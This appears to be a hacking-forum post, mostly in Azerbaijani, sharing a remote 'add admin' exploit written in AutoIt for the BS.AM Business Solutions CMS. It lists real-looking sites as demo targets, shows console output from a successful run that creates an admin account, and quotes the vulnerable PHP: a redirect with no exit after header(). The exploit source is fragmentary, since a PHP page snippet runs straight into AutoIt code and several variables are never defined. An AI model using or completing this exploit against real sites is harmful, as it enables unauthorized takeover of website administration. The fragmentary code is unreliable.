Bu da fucked xaçiklərin növbəti CMS-i üçün Private exploitim(Artıq publicdir)
Exploitin məqsədi hədəf sayta ADMİN akkaunt əlavə etməkdir.Sonrası da məlumdur http://pastebin.com/0z8TnP1n
Videosu:
İşdir kimsə compilədə əziyyət çəksə xəbər eləsin compilə edilmiş versiyasını verim.
BS.AM (BUSINESS SOLUTIONS) CMS REMOTE ADD ADMIN EXPLOIT.
THIS IS A EXPLOIT WRITTEN IN AUTOIT SCRIPTING/PROGRAMMING LANGUAGE.
ON SUCCESSFULL REMOTE EXPLOITATION IT WILL NEW ADMIN TO TARGET SITE.
***** THIS IS A WHOLE EXPLOIT! *****
THANK YOU!
FEW DEMOS:
http://asba.am
http://doors.am
DEMO USAGE:
>poc.exe http://asba.am bigbang bigbang
##############################################################
(BS.AM Business Solutions CMS) REMOTE ADD ADMIN EXPLOIT(priv8)
Usage: poc.exe http://site.tld username password
[*] DON'T HATE FROM HACKER, HATE YOUR OWN CODE! [*]
[@@@] Vuln & Exploit By AkaStep [@@@]
##############################################################
[+] GETTING INFO ABOUT CMS [+]
[*] GOT Response : Yes! It is exactly that we are looking for! [*]
##################################################
Trying to add new admin:
To Site:www.asba.am
With Username: bigbang
With Password: bigbang
##################################################
##################################################
Exploit Try Count:2
##################################################
Error Count: 0
##################################################
Count of errors during exploitation : 0
##################################################
[*] Seems we are going to travel xD. [*]
Try to login @
Site: asba.am/cms/index.php
With Username: bigbang
With Password: bigbang
##################################################
[*] Exit [*]
##################################################
VULNERABLE CODE:
NOTICE script continues it's execution.Because missing exit; after header();
FUNNY TO SEE HOW MANY PROGRAMMERS FAILS TO UNDERSTAND THIS;)
//cms/admin.php
============SNIP BEGINS============
<?
session_start();
if ($_SESSION['login11_error'] != "no")
header("Location: index.php");
include 'config.php';?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>cms::</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel="stylesheet" type="text/css" href="css/main.css" />
<script type="text/javascript" src="javascript/jquery-1.4.2.js"></script>
if $CmdLine[0]=3 Then
$targetsite=$CmdLine[1];
$username=$CmdLine[2];
$password=$CmdLine[3];
EndIf
if StringStripWS($targetsite,8)='' OR StringStripWS($username,8)='' OR StringStripWS($password,8)='' Then
ConsoleWrite('Are you kidding me?');
Exit;
EndIf
$doublecheck=InetGet($targetsite,'',1);
if @error Then
ConsoleWrite('[*] Are you sure that site exist? Theris an error! Please Try again! [*]' & @CRLF)
Exit;
EndIf
ConsoleWrite('[+] GETTING INFO ABOUT CMS [+] ' & @CRLF);
sleep(Random(1200,2500,1));
if StringInStr($sidentify,$cmsindent) Then
ConsoleWrite("[*] GOT Response : Yes! It is exactly that we are looking for! [*]" & @CRLF)
Else
ConsoleWrite("[*] IDENTIFICATION RESULT IS WRONG!. Anyway,forcing to try exploit it. [*]" & @CRLF)
$error+=1;
EndIf
Global $sHeader, $sReturned
If _WinHttpQueryDataAvailable($hRequest) Then
$sHeader = _WinHttpQueryHeaders($hRequest)
Do
$sReturned &= _WinHttpReadData($hRequest)
Until @error